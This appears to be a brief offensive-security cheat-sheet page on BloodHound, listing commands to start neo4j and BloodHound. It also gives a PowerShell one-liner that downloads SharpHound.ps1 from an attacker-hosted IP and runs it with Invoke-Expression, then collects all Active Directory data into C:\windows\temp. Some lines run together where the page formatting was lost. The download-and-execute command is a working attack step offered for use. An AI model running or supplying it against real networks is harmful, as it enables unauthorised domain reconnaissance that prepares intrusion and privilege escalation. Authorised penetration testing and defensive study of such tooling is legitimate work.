BloodHound
Install
Start neo4j
/usr/bin/neo4j consoleStart BloodHound
bloodhound &Powershell
iex(New-Object Net.Webclient).downloadstring("http://192.168.X.Y/SharpHound.ps1");
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\windows\temp\Last updated
Was this helpful?